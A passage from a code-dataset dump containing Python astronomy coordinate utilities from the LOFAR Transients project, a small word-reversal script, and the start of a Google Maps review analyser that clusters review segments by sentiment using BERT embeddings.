blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
45576ef9da9da86d57d05b3f6633784b1017820e | Python | transientskp/tkp | /tkp/utility/coordinates.py | UTF-8 | 20,422 | 2.90625 | 3 | [
"BSD-2-Clause"
] | permissive | #
# LOFAR Transients Key Project
"""
General purpose astronomical coordinate handling routines.
"""
import datetime
import logging
import math
import sys
import pytz
from astropy import wcs as pywcs
from casacore.measures import measures
from casacore.quanta import quantity
logger = logging.getLogger(__name__)
# Note that we take a +ve longitude as WEST.
CORE_LAT = 52.9088
CORE_LON = -6.8689
# ITRF position of CS002
# Should be a good approximation for anything refering to the LOFAR core.
ITRF_X = 3826577.066110000
ITRF_Y = 461022.947639000
ITRF_Z = 5064892.786
# Useful constants
SECONDS_IN_HOUR = 60 ** 2
SECONDS_IN_DAY = 24 * SECONDS_IN_HOUR
def julian_date(time=None, modified=False):
    """
    Calculate the Julian date at a given timestamp.

    Args:
        time (datetime.datetime): Timezone-aware timestamp to calculate the
            Julian date for. Defaults to the current UTC time.
        modified (bool): If True, return the Modified Julian Date:
            the number of days (including fractions) which have elapsed between
            the start of 17 November 1858 AD and the specified time.

    Returns:
        float: (Modified) Julian date value.
    """
    # Identity check rather than truthiness: a datetime is never falsy, and
    # `is None` states the intent. The stdlib timezone.utc replaces the
    # previous third-party pytz.utc; the two are interchangeable for UTC.
    if time is None:
        time = datetime.datetime.now(datetime.timezone.utc)
    # Offset from the Modified Julian epoch, 1858-11-17 00:00 UTC.
    mjdstart = datetime.datetime(1858, 11, 17, tzinfo=datetime.timezone.utc)
    mjd = time - mjdstart
    mjd_daynumber = (mjd.days + mjd.seconds / (24. * 60 ** 2) +
                     mjd.microseconds / (24. * 60 ** 2 * 1000 ** 2))
    if modified:
        return mjd_daynumber
    # JD = MJD + 2400000.5 by definition.
    return 2400000.5 + mjd_daynumber
def mjd2datetime(mjd):
    """
    Convert a Modified Julian Date to a datetime instance, going via the
    'unix time' representation defined by the casacore package.

    NB the result is in the local timezone, as produced by
    datetime.datetime.fromtimestamp().
    """
    unix_seconds = quantity("%sd" % mjd).to_unix_time()
    return datetime.datetime.fromtimestamp(unix_seconds)
def mjd2lst(mjd, position=None):
    """
    Converts a Modified Julian Date into Local Apparent Sidereal Time in
    seconds at a given position. If position is None, we default to the
    reference position of CS002.

    Args:
        mjd (float): Modified Julian Date (in days)
        position (casacore measure): Position for the LST calculation

    Returns:
        float: Local Apparent Sidereal Time in seconds.
    """
    dm = measures()
    # Default to the ITRF position of LOFAR station CS002 (module constants).
    position = position or dm.position(
        "ITRF", "%fm" % ITRF_X, "%fm" % ITRF_Y, "%fm" % ITRF_Z
    )
    dm.do_frame(position)
    # "LAST" = Local Apparent Sidereal Time; the m0 value is in days, so the
    # fractional part is the sidereal time of day.
    last = dm.measure(dm.epoch("UTC", "%fd" % mjd), "LAST")
    fractional_day = last['m0']['value'] % 1
    return fractional_day * 24 * SECONDS_IN_HOUR
def mjds2lst(mjds, position=None):
    """
    As mjd2lst(), but takes an argument in seconds rather than days.

    Args:
        mjds (float): Modified Julian Date (in seconds)
        position (casacore measure): Position for LST calcs

    Returns:
        float: Local Apparent Sidereal Time in seconds.
    """
    return mjd2lst(mjds / SECONDS_IN_DAY, position)
def jd2lst(jd, position=None):
    """
    Converts a Julian Date into Local Apparent Sidereal Time in seconds at a
    given position. If position is None, we default to the reference position
    of CS002.

    Args:
        jd (float): Julian Date
        position (casacore measure): Position for LST calcs.

    Returns:
        float: Local Apparent Sidereal Time in seconds.
    """
    # JD = MJD + 2400000.5, so subtract the offset before delegating.
    return mjd2lst(jd - 2400000.5, position)
# NB: datetime is not sensitive to leap seconds.
# However, leap seconds were first introduced in 1972.
# So there are no leap seconds between the start of the
# Modified Julian epoch and the start of the Unix epoch,
# so this calculation is safe.
# julian_epoch = datetime.datetime(1858, 11, 17)
# unix_epoch = datetime.datetime(1970, 1, 1, 0, 0)
# delta = unix_epoch - julian_epoch
# deltaseconds = delta.total_seconds()
# unix_epoch = 3506716800
# The above is equivalent to this:
# Number of seconds between the Modified Julian epoch (1858-11-17) and the
# Unix epoch (1970-01-01), as computed by casacore's quantity parser.
unix_epoch = quantity("1970-01-01T00:00:00").get_value('s')
def julian2unix(timestamp):
    """
    Convert a modified Julian timestamp (number of seconds since 17 November
    1858) to Unix timestamp (number of seconds since 1 January 1970).

    Args:
        timestamp (numbers.Number): Number of seconds since the modified
            Julian epoch.

    Returns:
        numbers.Number: Number of seconds since the Unix epoch.
    """
    return timestamp - unix_epoch
def unix2julian(timestamp):
    """
    Convert a Unix timestamp (number of seconds since 1 January 1970) to a
    modified Julian timestamp (number of seconds since 17 November 1858).

    Args:
        timestamp (numbers.Number): Number of seconds since the Unix epoch.

    Returns:
        numbers.Number: Number of seconds since the modified Julian epoch.
    """
    return timestamp + unix_epoch
def sec2deg(seconds):
    """Convert seconds of time into degrees of arc (360 degrees = 24 hours)."""
    arc_degrees = 15.0 * seconds / 3600.0
    return arc_degrees
def sec2days(seconds):
    """Convert a number of seconds into a (fractional) number of days."""
    day_fraction = seconds / (24.0 * 3600)
    return day_fraction
def sec2hms(seconds):
    """Split a number of seconds into an (hours, minutes, seconds) tuple.

    Hours and minutes are truncated to ints; the seconds element keeps the
    fractional part of the input.
    """
    full_hours, remainder = divmod(seconds, 60 ** 2)
    full_minutes, leftover_seconds = divmod(remainder, 60)
    return (int(full_hours), int(full_minutes), leftover_seconds)
def altaz(mjds, ra, dec, lat=CORE_LAT):
    """Calculates the azimuth and elevation of source from time and position
    on sky. Takes MJD in seconds and ra, dec in degrees. Returns (alt, az) in
    degrees."""
    # compute hour angle in degrees
    # NOTE(review): mjds2lst() returns sidereal time in *seconds*, while ra
    # is in degrees -- the subtraction mixes units. sec2deg() looks like it
    # was meant to convert the LST first; confirm against callers.
    ha = mjds2lst(mjds) - ra
    if (ha < 0):
        ha = ha + 360
    # convert degrees to radians
    ha, dec, lat = [math.radians(value) for value in (ha, dec, lat)]
    # compute altitude in radians
    sin_alt = (math.sin(dec) * math.sin(lat) +
               math.cos(dec) * math.cos(lat) * math.cos(ha))
    alt = math.asin(sin_alt)
    # compute azimuth in radians
    # divide by zero error at poles or if alt = 90 deg
    cos_az = ((math.sin(dec) - math.sin(alt) * math.sin(lat)) /
              (math.cos(alt) * math.cos(lat)))
    az = math.acos(cos_az)
    # convert radians to degrees
    hrz_altitude, hrz_azimuth = [math.degrees(value) for value in (alt, az)]
    # choose hemisphere: mirror the azimuth when the source is west of the
    # meridian (positive hour angle).
    if (math.sin(ha) > 0):
        hrz_azimuth = 360 - hrz_azimuth
    return hrz_altitude, hrz_azimuth
def ratohms(radegs):
    """Convert RA in decimal degrees format to an (hours, minutes, seconds)
    tuple.

    Keyword arguments:
    radegs -- RA in degrees format

    Return value:
    ra -- tuple of 3 values, (hours, minutes, seconds)
    """
    # Wrap into [0, 360), then convert degrees of arc to seconds of time
    # (15 degrees per hour) and split sexagesimally.
    wrapped_degrees = radegs % 360
    total_seconds = wrapped_degrees * 3600 / 15.0
    hours, remainder = divmod(total_seconds, 60 ** 2)
    minutes, seconds = divmod(remainder, 60)
    return (int(hours), int(minutes), seconds)
def dectodms(decdegs):
    """Convert a Declination in decimal degrees into a
    (degrees, minutes, seconds) tuple.

    Keyword arguments:
    decdegs -- Dec. in degrees format

    Return value:
    dec -- tuple of 3 values, (degrees, minutes, seconds); for negative
    inputs the sign is carried by the most significant non-zero element.

    Raises:
    ValueError -- if the declination lies outside [-90, 90].
    """
    negative = decdegs < 0
    magnitude = abs(decdegs)
    if magnitude > 90:
        raise ValueError("coordinate out of range")
    whole_degrees = int(magnitude)
    arcmin_float = (magnitude - whole_degrees) * 60
    whole_minutes = int(arcmin_float)
    arcseconds = (arcmin_float - whole_minutes) * 60
    # Guard against e.g. 59.9999999 seconds produced by float roundoff.
    if arcseconds - 60 > -1e-7:
        whole_minutes += 1
        arcseconds = 0
    if whole_minutes == 60:
        whole_degrees += 1
        whole_minutes = 0
    if whole_degrees > 90:
        raise ValueError("coordinate out of range")
    # Attach the sign to the most significant non-zero component so that
    # values such as -0d30m are representable.
    if negative:
        if whole_degrees == 0 and whole_minutes == 0:
            arcseconds = -arcseconds
        elif whole_degrees == 0:
            whole_minutes = -whole_minutes
        else:
            whole_degrees = -whole_degrees
    return (whole_degrees, whole_minutes, arcseconds)
def propagate_sign(val1, val2, val3):
    """
    casacore (reasonably enough) demands that a minus sign (if required)
    comes at the start of the quantity. Thus "-0D30M" rather than "0D-30M".
    Python regards "-0" as equal to "0"; we need to split off a separate sign
    field.

    If more than one of our inputs is negative, it's not clear what the user
    meant: we raise.

    Args:
        val1 (float): (, val2, val3) input values (hour/min/sec or deg/min/sec)

    Returns:
        tuple: "+" or "-" string denoting sign,
            val1, val2, val3 (numeric) denoting absolute values of inputs.

    Raises:
        ValueError: if two or more inputs are negative.
    """
    negative_count = sum(1 for value in (val1, val2, val3) if value < 0)
    if negative_count == 0:
        return "+", val1, val2, val3
    if negative_count == 1:
        return "-", abs(val1), abs(val2), abs(val3)
    raise ValueError("Too many negative coordinates")
def hmstora(rah, ram, ras):
    """Convert RA in hours, minutes, seconds format to decimal
    degrees format.

    Keyword arguments:
    rah,ram,ras -- RA values (h,m,s)

    Return value:
    radegs -- RA in decimal degrees

    Raises:
    ValueError -- if the result is >= 360 degrees in magnitude, or if more
    than one input is negative (via propagate_sign).
    """
    # Normalise the sign, then let casacore's quantity parser do the
    # sexagesimal-to-degrees arithmetic.
    sign, rah, ram, ras = propagate_sign(rah, ram, ras)
    ra = quantity("%s%dH%dM%f" % (sign, rah, ram, ras)).get_value()
    if abs(ra) >= 360:
        raise ValueError("coordinates out of range")
    return ra
def dmstodec(decd, decm, decs):
    """Convert Dec in degrees, minutes, seconds format to decimal
    degrees format.

    Keyword arguments:
    decd, decm, decs -- Dec values (d,m,s)

    Return value:
    decdegs -- Dec in decimal degrees

    Raises:
    ValueError -- if the result exceeds 90 degrees in magnitude, or if more
    than one input is negative (via propagate_sign).
    """
    # Normalise the sign, then let casacore's quantity parser do the
    # sexagesimal-to-degrees arithmetic.
    sign, decd, decm, decs = propagate_sign(decd, decm, decs)
    dec = quantity("%s%dD%dM%f" % (sign, decd, decm, decs)).get_value()
    if abs(dec) > 90:
        raise ValueError("coordinates out of range")
    return dec
def cmp(a, b):
    """Three-way comparison (Python 2's built-in cmp): 1 if a > b,
    -1 if a < b, otherwise 0."""
    greater = int(a > b)
    lesser = int(a < b)
    return greater - lesser
def angsep(ra1, dec1, ra2, dec2):
    """Find the angular separation of two sources, in arcseconds,
    using the proper spherical trig formula

    Keyword arguments:
    ra1,dec1 -- RA and Dec of the first source, in decimal degrees
    ra2,dec2 -- RA and Dec of the second source, in decimal degrees

    Return value:
    angsep -- Angular separation, in arcseconds
    """
    # Work with co-latitudes (angle from the pole) for the spherical law of
    # cosines.
    colat1 = (math.pi / 2) - math.radians(dec1)
    colat2 = (math.pi / 2) - math.radians(dec2)
    cos_sep = (math.cos(colat1) * math.cos(colat2)) + (
        math.sin(colat1) * math.sin(colat2) *
        math.cos(math.radians(ra1 - ra2)))
    # Clamp to [-1, 1]: it makes no sense to take math.acos() of a value
    # outside this range, but rounding errors can occasionally push us there.
    if abs(cos_sep) > 1.0:
        cos_sep = math.copysign(1.0, cos_sep)
    return 3600 * math.degrees(math.acos(cos_sep))
def alphasep(ra1, ra2, dec1, dec2):
    """Find the angular separation of two sources in RA, in arcseconds

    Keyword arguments:
    ra1,dec1 -- RA and Dec of the first source, in decimal degrees
    ra2,dec2 -- RA and Dec of the second source, in decimal degrees

    Return value:
    angsep -- Angular separation, in arcseconds
    """
    # Scale the RA difference by the cosine of the mean declination.
    mean_dec = (dec1 + dec2) / 2.0
    return 3600 * (ra1 - ra2) * math.cos(math.radians(mean_dec))
def deltasep(dec1, dec2):
    """Find the angular separation of two sources in Dec, in arcseconds

    Keyword arguments:
    dec1 -- Dec of the first source, in decimal degrees
    dec2 -- Dec of the second source, in decimal degrees

    Return value:
    angsep -- Angular separation, in arcseconds
    """
    arcsec_per_degree = 3600
    return arcsec_per_degree * (dec1 - dec2)
# Find angular separation in Dec of 2 positions, in arcseconds
def alpha(l, m, alpha0, delta0):
    """Convert a coordinate in l,m into an coordinate in RA

    Keyword arguments:
    l,m -- direction cosines, given by (offset in cells) x cellsi (radians)
    alpha_0, delta_0 -- centre of the field

    Return value:
    alpha -- RA in decimal degrees
    """
    delta0_rad = math.radians(delta0)
    denominator = (math.sqrt(1 - (l * l) - (m * m)) * math.cos(delta0_rad)) - (
        m * math.sin(delta0_rad))
    return alpha0 + math.degrees(math.atan2(l, denominator))
def alpha_inflate(theta, decl):
    """Compute the ra expansion for a given theta at a given declination

    Keyword arguments:
    theta, decl are both in decimal degrees.

    Return value:
    alpha -- RA inflation in decimal degrees

    For a derivation, see MSR TR 2006 52, Section 2.1
    http://research.microsoft.com/apps/pubs/default.aspx?id=64524
    """
    # Close to the pole the RA band wraps the whole way around.
    if abs(decl) + theta > 89.9:
        return 180.0
    numerator = math.sin(math.radians(theta))
    denominator = math.sqrt(abs(
        math.cos(math.radians(decl - theta)) *
        math.cos(math.radians(decl + theta))))
    return math.degrees(abs(math.atan(numerator / denominator)))
# Find the RA of a point in a radio image, given l,m and field centre
def delta(l, m, delta0):
    """Convert a coordinate in l, m into an coordinate in Dec

    Keyword arguments:
    l, m -- direction cosines, given by (offset in cells) x cellsi (radians)
    delta_0 -- declination of the centre of the field

    Return value:
    delta -- Dec in decimal degrees
    """
    delta0_rad = math.radians(delta0)
    sin_dec = m * math.cos(delta0_rad) + (
        math.sqrt(1 - (l * l) - (m * m)) * math.sin(delta0_rad))
    return math.degrees(math.asin(sin_dec))
def l(ra, dec, cra, incr):
    """Convert a coordinate in RA,Dec into a direction cosine l

    Keyword arguments:
    ra,dec -- Source location
    cra -- RA centre of the field
    incr -- number of degrees per pixel (negative in the case of RA)

    Return value:
    l -- Direction cosine
    """
    ra_offset_term = math.cos(math.radians(dec)) * math.sin(math.radians(ra - cra))
    return ra_offset_term / (math.radians(incr))
def m(ra, dec, cra, cdec, incr):
    """Convert a coordinate in RA,Dec into a direction cosine m

    Keyword arguments:
    ra,dec -- Source location
    cra,cdec -- centre of the field
    incr -- number of degrees per pixel

    Return value:
    m -- direction cosine
    """
    numerator = (math.sin(math.radians(dec)) * math.cos(math.radians(cdec))) - (
        math.cos(math.radians(dec)) * math.sin(math.radians(cdec)) *
        math.cos(math.radians(ra - cra)))
    return numerator / math.radians(incr)
def lm_to_radec(ra0, dec0, l, m):
    """
    Find the l direction cosine in a radio image, given an RA and Dec and the
    field centre

    Args (apparently all in radians, judging from the raw trig calls below --
    TODO confirm against callers):
        ra0, dec0: phase centre
        l, m: direction cosines

    Returns:
        tuple: (ra, dec) in radians.
    """
    # This function should be the inverse of radec_to_lmn, but it is
    # not. There is likely an error here.
    sind0 = math.sin(dec0)
    cosd0 = math.cos(dec0)
    dl = l
    dm = m
    d0 = dm * dm * sind0 * sind0 + dl * dl - 2 * dm * cosd0 * sind0
    sind = math.sqrt(abs(sind0 * sind0 - d0))
    cosd = math.sqrt(abs(cosd0 * cosd0 + d0))
    # Force the declination into the same hemisphere as the phase centre.
    if (sind0 > 0):
        sind = abs(sind)
    else:
        sind = -abs(sind)
    dec = math.atan2(sind, cosd)
    # Avoid atan2(0, ...) degeneracy by substituting a tiny numerator when
    # l is exactly zero.
    if l != 0:
        ra = math.atan2(-dl, (cosd0 - dm * sind0)) + ra0
    else:
        ra = math.atan2((1e-10), (cosd0 - dm * sind0)) + ra0
    # Calculate RA,Dec from l,m and phase center. Note: As done in
    # Meqtrees, which seems to differ from l, m functions above. Meqtrees
    # equation may have problems, judging from my difficulty fitting a
    # fringe to L4086 data. Pandey's equation is now used in radec_to_lmn
    return (ra, dec)
def radec_to_lmn(ra0, dec0, ra, dec):
    """Convert an (ra, dec) direction (radians) into direction cosines
    (l, m, n) relative to the phase centre (ra0, dec0)."""
    sin_dec0 = math.sin(dec0)
    delta_ra = ra - ra0
    l = math.cos(dec) * math.sin(delta_ra)
    if sin_dec0 != 0:
        # Pandey's formulation; gives the same results for the CasA and
        # CygA test cases.
        m = (math.sin(dec) * math.cos(dec0) -
             math.cos(dec) * sin_dec0 * math.cos(delta_ra))
    else:
        m = 0
    n = math.sqrt(1 - l ** 2 - m ** 2)
    return (l, m, n)
def eq_to_gal(ra, dec):
    """Find the Galactic co-ordinates of a source given the equatorial
    co-ordinates

    Keyword arguments:
    (ra, dec) -- RA, Dec in decimal degrees

    Return value:
    (l, b) -- Galactic longitude and latitude, in decimal degrees
    """
    dm = measures()
    result = dm.measure(
        # The reference frame was previously misspelled "J200", which is not
        # a frame code casacore recognises; it must be "J2000".
        dm.direction("J2000", "%fdeg" % ra, "%fdeg" % dec),
        "GALACTIC"
    )
    lon_l = math.degrees(result['m0']['value']) % 360  # 0 < l < 360
    lat_b = math.degrees(result['m1']['value'])
    return lon_l, lat_b
def gal_to_eq(lon_l, lat_b):
    """Find the equatorial co-ordinates of a source given the Galactic
    co-ordinates

    Keyword arguments:
    (l, b) -- Galactic longitude and latitude, in decimal degrees

    Return value:
    (alpha, delta) -- RA, Dec in decimal degrees
    """
    dm = measures()
    result = dm.measure(
        dm.direction("GALACTIC", "%fdeg" % lon_l, "%fdeg" % lat_b),
        "J2000"
    )
    ra = math.degrees(result['m0']['value']) % 360  # 0 < ra < 360
    dec = math.degrees(result['m1']['value'])
    return ra, dec
def eq_to_cart(ra, dec):
    """Return the (x, y, z) Cartesian position on the unit sphere for
    equatorial coordinates ra, dec given in degrees."""
    ra_rad = math.radians(ra)
    dec_rad = math.radians(dec)
    cos_dec = math.cos(dec_rad)
    return (cos_dec * math.cos(ra_rad),   # Cartesian x
            cos_dec * math.sin(ra_rad),   # Cartesian y
            math.sin(dec_rad))            # Cartesian z
class CoordSystem(object):
    """A container for constant strings representing different coordinate
    systems."""
    # Besselian 1950 equinox, FK4 reference frame.
    FK4 = "B1950 (FK4)"
    # Julian 2000 equinox, FK5 reference frame.
    FK5 = "J2000 (FK5)"
def coordsystem(name):
    """Given a string, return a constant from class CoordSystem.

    Raises KeyError (with the lower-cased name) if the string is not a
    recognised alias.
    """
    key = name.lower()
    alias_table = (
        (('j2000', 'fk5', CoordSystem.FK5.lower()), CoordSystem.FK5),
        (('b1950', 'fk4', CoordSystem.FK4.lower()), CoordSystem.FK4),
    )
    for aliases, system in alias_table:
        if key in aliases:
            return system
    raise KeyError(key)
def convert_coordsystem(ra, dec, insys, outsys):
    """
    Convert RA & dec (given in decimal degrees) between equinoxes.

    Args:
        ra, dec (float): Position in decimal degrees.
        insys, outsys: Input and output systems; one of the CoordSystem
            constants (CoordSystem.FK4 or CoordSystem.FK5).

    Returns:
        tuple: (ra, dec) in decimal degrees in the output system.

    Raises:
        Exception: if either system is not a recognised CoordSystem value.
    """
    dm = measures()
    # Map our CoordSystem constants onto the frame codes casacore expects.
    if insys == CoordSystem.FK4:
        insys = "B1950"
    elif insys == CoordSystem.FK5:
        insys = "J2000"
    else:
        raise Exception("Unknown Coordinate System")
    if outsys == CoordSystem.FK4:
        outsys = "B1950"
    elif outsys == CoordSystem.FK5:
        outsys = "J2000"
    else:
        raise Exception("Unknown Coordinate System")
    result = dm.measure(
        dm.direction(insys, "%fdeg" % ra, "%fdeg" % dec),
        outsys
    )
    ra = math.degrees(result['m0']['value']) % 360  # 0 < ra < 360
    dec = math.degrees(result['m1']['value'])
    return ra, dec
class WCS(object):
    """
    Wrapper around pywcs.WCS.

    This is primarily to preserve API compatibility with the earlier,
    home-brewed python-wcslib wrapper. It includes:

    * A fix for the reference pixel lying at the zenith;
    * Raises an error if coordinates are invalid.
    """
    # ORIGIN is the upper-left corner of the image. pywcs supports both 0
    # (NumPy, C-style) or 1 (FITS, Fortran-style). The TraP uses 1.
    ORIGIN = 1
    # We can set these attributes on the pywcs.WCS().wcs object to configure
    # the coordinate system.
    WCS_ATTRS = ("crpix", "cdelt", "crval", "ctype", "cunit", "crota")

    def __init__(self):
        # Currently, we only support two dimensional images.
        self.wcs = pywcs.WCS(naxis=2)

    def __setattr__(self, attrname, value):
        if attrname in self.WCS_ATTRS:
            # Account for arbitrary coordinate rotations in images pointing at
            # the North Celestial Pole. We set the reference direction to
            # infintesimally less than 90 degrees to avoid any ambiguity. See
            # discussion at #4599.
            if attrname == "crval" and (
                    value[1] == 90 or value[1] == math.pi / 2):
                value = (value[0], value[1] * (1 - sys.float_info.epsilon))
            self.wcs.wcs.__setattr__(attrname, value)
        else:
            super(WCS, self).__setattr__(attrname, value)

    def __getattr__(self, attrname):
        # WCS configuration attributes are proxied through to the wrapped
        # pywcs object.
        if attrname in self.WCS_ATTRS:
            return getattr(self.wcs.wcs, attrname)
        # Previously this called super().__getattr__(), which does not exist
        # on object: it still raised AttributeError, but with a misleading
        # "'super' object has no attribute" message. Raise the conventional
        # AttributeError explicitly instead.
        raise AttributeError(attrname)

    def p2s(self, pixpos):
        """
        Pixel to Spatial coordinate conversion.

        Args:
            pixpos (tuple): [x, y] pixel position

        Returns:
            tuple: ra (float) Right ascension corresponding to position [x, y]
                dec (float) Declination corresponding to position [x, y]

        Raises:
            RuntimeError: if the conversion produces NaN coordinates.
        """
        ra, dec = self.wcs.wcs_pix2world(pixpos[0], pixpos[1], self.ORIGIN)
        if math.isnan(ra) or math.isnan(dec):
            raise RuntimeError("Spatial position is not a number")
        return float(ra), float(dec)

    def s2p(self, spatialpos):
        """
        Spatial to Pixel coordinate conversion.

        Args:
            spatialpos (tuple): [ra, dec] spatial position

        Returns:
            tuple: X pixel value corresponding to position [ra, dec],
                Y pixel value corresponding to position [ra, dec]

        Raises:
            RuntimeError: if the conversion produces NaN coordinates.
        """
        x, y = self.wcs.wcs_world2pix(spatialpos[0], spatialpos[1], self.ORIGIN)
        if math.isnan(x) or math.isnan(y):
            raise RuntimeError("Pixel position is not a number")
        return float(x), float(y)
| true |
046719c95e3e1759e4b24efef4c0aca062e3cd10 | Python | hritik1330/GUVI | /hunter/set-10/94.py | UTF-8 | 96 | 3.234375 | 3 | [] | no_license | ss = list(input().split())
for i in range(len(ss)):
ss[i] = ss[i][::-1]
print(" ".join(ss))
| true |
b92c6c6e33d995fd87273751314705a721ce1cb2 | Python | andrewlarimer/location-buzz | /app/location_analyzer.py | UTF-8 | 15,603 | 2.578125 | 3 | [] | no_license | #!/usr/bin/env python
# coding: utf-8
import googlemaps
import re
from sklearn.cluster import KMeans
from bert_serving.client import BertClient
import requests
import json
from collections import defaultdict, Counter
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import numpy as np
import pandas as pd
import os
import socket
def evaluate(CHAIN_NAME='starbucks', CITY_NAME='austin', RADIUS='50000'):
    """
    Analyse Google Maps reviews for a chain's locations around a city.

    Fetches locations matching CHAIN_NAME within RADIUS metres of CITY_NAME,
    splits their reviews into short segments, embeds the segments via a
    BERT-as-a-service server, scores them with VADER sentiment, then k-means
    clusters the positive / neutral / negative segments and packages the
    clusters plus a sentiment ranking of the locations for display.

    Args:
        CHAIN_NAME (str): Business name to search for.
        CITY_NAME (str): City around which to search.
        RADIUS (str): Search radius in metres (passed to the Places API).

    Returns:
        dict: keys 'city_name', 'chain_name', 'location_addresses',
            'location_ranks_and_scores', 'pos_clusters', 'neu_clusters',
            'neg_clusters'.
    """
    # Negative sentiment is weighted more heavily than positive sentiment.
    NEGATIVE_EMPHASIS = 2
    N_CLUSTERS_PER_SENTI = 3
    gmaps_key = os.environ['GMAPS_API_KEY']
    # Resolve the BERT service through cluster DNS; fall back to localhost
    # for local development.
    try:
        bert_ip = socket.gethostbyname('bert.default')
        print(f"Found bert IP: {bert_ip}")
    except OSError:
        bert_ip = '127.0.0.1'
        print(f"Did not find bert IP via DNS lookup. Defaulted to: {bert_ip}")
    print(f"Trying to connect with Bert Server...")
    bc = BertClient(ip=bert_ip, port=5555)
    print(f"Established connection with Bert Server.")
    print(f"Loading GMaps API Key.")
    gm = googlemaps.Client(key=gmaps_key)
    print(f"Loaded GMaps API Key.")
    # Find the city's coordinates, then search for matching location names
    # within the radius.
    city_search = gm.find_place(input=CITY_NAME, input_type='textquery',
                                fields=['place_id'])
    city_id = city_search['candidates'][0]['place_id']
    city_details = gm.place(place_id=city_id,
                            fields=['name', 'formatted_address', 'geometry'])
    city_lat = city_details['result']['geometry']['location']['lat']
    city_long = city_details['result']['geometry']['location']['lng']
    search_results = gm.places_nearby(location=(city_lat, city_long),
                                      radius=RADIUS, keyword=CHAIN_NAME)
    print(f"Found {len(search_results['results'])} locations.")
    # Isolate the Place IDs and fetch each location's details and reviews.
    loc_ids = [location['place_id'] for location in search_results['results']]
    loc_details = []
    for loc_id in loc_ids:
        try:
            loc_details.append(gm.place(
                place_id=loc_id,
                fields=["name", "formatted_address", "rating", "review"]))
        except Exception:
            print(f"could not find place for location id: {loc_id}")
    # Split the retrieved reviews into sentence-like segments; segments of
    # 20 tokens or more are chunked into 20-token pieces for the encoder.
    seg_rev_list = []   # lower-cased segments, fed to BERT
    seg_text = []       # original-case segments, for display
    loc_addresses = []
    seg_map_to_rev_and_loc = []  # segment idx -> (review number, location idx)
    rev_text = []
    rev_num = 0
    for loc_idx, location_details in enumerate(loc_details):
        loc_addresses.append(location_details['result']['formatted_address'])
        for review in location_details['result']['reviews']:
            this_review = review['text']
            if this_review != "":
                rev_text.append(this_review)
                for review_segment in re.findall(
                        r"\w[\w’', %/:-?]+(?:.m.)?[\w’'% ,/:-]*", this_review):
                    if len(review_segment.strip()) < 2:
                        continue
                    tokenized_review_segment = review_segment.split(' ')
                    if len(tokenized_review_segment) < 20:
                        seg_text.append(review_segment.strip())
                        seg_rev_list.append(review_segment.lower().strip())
                        seg_map_to_rev_and_loc.append((rev_num, loc_idx))
                    else:
                        while len(tokenized_review_segment) >= 20:
                            review_start = " ".join(tokenized_review_segment[:20])
                            seg_text.append(review_start.strip())
                            seg_rev_list.append(review_start.lower().strip())
                            seg_map_to_rev_and_loc.append((rev_num, loc_idx))
                            tokenized_review_segment = tokenized_review_segment[20:]
                rev_num += 1
    print(f"Requesting embeddings of {len(seg_rev_list)} review segments.")
    # Get the BERT embeddings for every segment in one batch.
    seg_encodings = bc.encode(seg_rev_list, show_tokens=False)
    # Accumulate VADER sentiment per review and per location.
    print(f"Accumulating sentiment of {len(seg_rev_list)} review segments and locations.")
    sentibot = SentimentIntensityAnalyzer()
    # Maps review number / location index -> (accumulated sentiment,
    # list of segment indices).
    rev_dict_cumm_senti = defaultdict(lambda: (float(), []))
    loc_dict_cumm_senti = defaultdict(lambda: (float(), []))
    for i, segmented_review in enumerate(seg_rev_list):
        senti_result = sentibot.polarity_scores(segmented_review)
        this_senti = senti_result['pos'] - senti_result['neg'] * NEGATIVE_EMPHASIS
        rev_key, loc_key = seg_map_to_rev_and_loc[i]
        rev_senti_so_far, rev_indices_so_far = rev_dict_cumm_senti[rev_key]
        rev_dict_cumm_senti[rev_key] = (
            round(rev_senti_so_far + this_senti, 1), rev_indices_so_far + [i])
        loc_senti_so_far, loc_indices_so_far = loc_dict_cumm_senti[loc_key]
        loc_dict_cumm_senti[loc_key] = (
            round(loc_senti_so_far + this_senti, 1), loc_indices_so_far + [i])
    # Bucket segment indices by the cumulative sentiment of their review.
    positive_indices = []
    neutral_indices = []
    negative_indices = []
    for cumm_senti, this_indices in rev_dict_cumm_senti.values():
        if cumm_senti < 0:
            negative_indices += this_indices
        elif cumm_senti < 1:
            neutral_indices += this_indices
        else:
            positive_indices += this_indices

    def cluster_from_indices(indices_list, input_encodings=seg_encodings,
                             input_text=seg_text, n_clusters=N_CLUSTERS_PER_SENTI):
        """K-means cluster the selected segments; returns (labels,
        distance-to-assigned-centroid, segment texts)."""
        encodings = []
        text = []
        for idx in indices_list:
            encodings.append(input_encodings[idx])
            text.append(input_text[idx])
        # Can't ask k-means for more clusters than there are samples.
        if len(encodings) < 3:
            n_clusters = len(encodings)
        km = KMeans(n_clusters=n_clusters, max_iter=2400)
        seg_labels = km.fit_predict(encodings)
        seg_distances_to_all_ks = km.transform(encodings)
        seg_distance_to_nearest_k = []
        for i, label in enumerate(seg_labels):
            seg_distance_to_nearest_k.append(seg_distances_to_all_ks[i, label])
        return seg_labels, seg_distance_to_nearest_k, text

    pos_clust_labels, pos_clust_dist, pos_clust_text = cluster_from_indices(positive_indices)
    neu_clust_labels, neu_clust_dist, neu_clust_text = cluster_from_indices(neutral_indices)
    neg_clust_labels, neg_clust_dist, neg_clust_text = cluster_from_indices(negative_indices)
    # Words ignored when summarising clusters; includes the chain's own name.
    stopwords = {"i", "me", "my", "myself", "we", "our", "ours", "ourselves",
                 "you", "your", "yours", "yourself", "yourselves", "he", "him",
                 "his", "himself", "she", "her", "hers", "herself", "it", "its",
                 "itself", "they", "them", "their", "theirs", "themselves", "what",
                 "which", "who", "whom", "this", "that", "these", "those", "am", "is",
                 "are", "was", "were", "be", "been", "being", "have", "has", "had",
                 "having", "do", "does", "did", "doing", "a", "an", "the", "and",
                 "but", "if", "or", "because", "as", "until", "while", "of", "at",
                 "by", "for", "with", "about", "against", "between", "into",
                 "through", "during", "before", "after", "above", "below", "to",
                 "from", "up", "down", "in", "out", "on", "off", "over", "under",
                 "again", "further", "then", "once", "here", "there", "when", "where",
                 "why", "how", "all", "any", "both", "each", "few", "more", "most",
